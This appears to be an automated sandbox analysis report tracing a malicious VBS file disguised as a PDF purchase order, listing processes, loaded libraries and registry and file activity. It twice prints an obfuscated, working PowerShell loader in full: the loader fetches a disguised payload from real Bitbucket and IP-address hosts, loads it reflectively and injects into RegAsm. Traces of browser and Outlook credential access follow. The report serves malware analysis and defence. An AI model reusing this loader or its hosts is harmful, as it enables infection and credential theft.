        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6772:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qflcgbek.rhl.ps1
        Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-DC13112024_pdf.vbs"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: where.exe, 00000008.00000003.2670845670.0000000002915000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000003.2670976784.0000000002936000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000002.3403339543.0000000002963000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000002.3403339543.0000000002936000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000003.2673241150.0000000002940000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: PO-DC13112024_pdf.vbs Virustotal: Detection: 9%
        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '[encoded command string omitted]
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer/ina/312eihcir/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe Process created: C:\Windows\SysWOW64\where.exe "C:\Windows\SysWOW64\where.exe"
        Source: C:\Windows\SysWOW64\where.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: version.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: wininet.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: ieframe.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: netapi32.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: winhttp.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: secur32.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: mlang.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: propsys.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: winsqlite3.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: vaultcli.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: wintypes.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: dpapi.dll
        Source: C:\Windows\SysWOW64\where.exe Section loaded: cryptbase.dll
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe Section loaded: wininet.dll
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe Section loaded: mswsock.dll
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe Section loaded: dnsapi.dll
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe Section loaded: iphlpapi.dll
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe Section loaded: fwpuclnt.dll
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
        Source: Window Recorder Window detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: C:\Windows\SysWOW64\where.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: Binary string: where.pdbGCTL source: RegAsm.exe, 00000005.00000002.2489670846.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000003.2662569377.0000000000ECB000.00000004.00000001.00020000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000002.3403960085.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: where.pdb source: RegAsm.exe, 00000005.00000002.2489670846.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000003.2662569377.0000000000ECB000.00000004.00000001.00020000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000002.3403960085.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WKOyCvoOlM.exe, 00000007.00000002.3403075765.00000000000BE000.00000002.00000001.01000000.00000007.sdmp, WKOyCvoOlM.exe, 0000000A.00000002.3403074648.00000000000BE000.00000002.00000001.01000000.00000007.sdmp
        Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405002223.0000000004940000.00000040.00001000.00020000.00000000.sdmp, where.exe, 00000008.00000003.2483618951.000000000479A000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000003.2480888142.00000000045E9000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405002223.0000000004ADE000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: RegAsm.pdb source: where.exe, 00000008.00000002.3403339543.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405546672.0000000004F6C000.00000004.10000000.00040000.00000000.sdmp, WKOyCvoOlM.exe, 0000000A.00000000.2559847193.00000000029CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2782973347.000000000B3BC000.00000004.80000000.00040000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, where.exe, where.exe, 00000008.00000002.3405002223.0000000004940000.00000040.00001000.00020000.00000000.sdmp, where.exe, 00000008.00000003.2483618951.000000000479A000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000003.2480888142.00000000045E9000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405002223.0000000004ADE000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: RegAsm.pdb4 source: where.exe, 00000008.00000002.3403339543.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405546672.0000000004F6C000.00000004.10000000.00040000.00000000.sdmp, WKOyCvoOlM.exe, 0000000A.00000000.2559847193.00000000029CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2782973347.000000000B3BC000.00000004.80000000.00040000.00000000.sdmp
        Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdb source: powershell.exe, 00000004.00000002.2244616127.00000127D3BDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244534059.00000127CEBE0000.00000004.08000000.00040000.00000000.sdmp

        Data Obfuscation

        Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Network");IWshNetwork2.ComputerName();IWshShell3.Run("powershell "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$", "0")
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $codigo = <obfuscated encoded string>
        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = <obfuscated encoded string>
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer/ina/312eihcir/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00424983 push edi; retf ABF4h 5_2_004249D2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_004098D3 push eax; ret 5_2_004098E5
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0040214F push esi; ret 5_2_00402179
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0040217C push esi; ret 5_2_00402179
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00418263 push eax; ret 5_2_0041834D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00401A6A push es; ret 5_2_00401A2C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00401A79 push ss; ret 5_2_00401A81
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00401A1D push ss; ret 5_2_00401A25
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0041834E push eax; ret 5_2_0041834D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0041835E push eax; ret 5_2_0041834D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_004033F0 push eax; ret 5_2_004033F2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0040AC12 push edx; ret 5_2_0040AC17
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0041854B push edi; retf 5_2_00418557
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_004085DE push FFFFFFCFh; ret 5_2_004085EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00414D86 push esi; iretd 5_2_00414DD6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00417599 push edx; retf 5_2_0041762D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00414DBC push esi; iretd 5_2_00414DD6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0041864E push eax; retf 5_2_00418651
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0041761F push edx; retf 5_2_0041762D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0041762F push ebp; retf 5_2_0041766B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_004016DA push esi; ret 5_2_004016DB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0040D704 push cs; retf 5_2_0040D71F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_004017CB push esi; ret 5_2_004017CC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_031F09AD push ecx; mov dword ptr [esp], ecx 5_2_031F09B6
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe Code function: 7_2_0357ED3B push edi; retf ABF4h 7_2_0357ED8A
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe Code function: 7_2_03572A06 push eax; retf 7_2_03572A09
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe Code function: 7_2_03567ABC push cs; retf 7_2_03567AD7
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe Code function: 7_2_03571951 push edx; retf 7_2_035719E5
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe Code function: 7_2_0356F174 push esi; iretd 7_2_0356F18E
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe Code function: 7_2_03572903 push edi; retf 7_2_0357290F
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe Code function: 7_2_0356F13E push esi; iretd 7_2_0356F18E

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
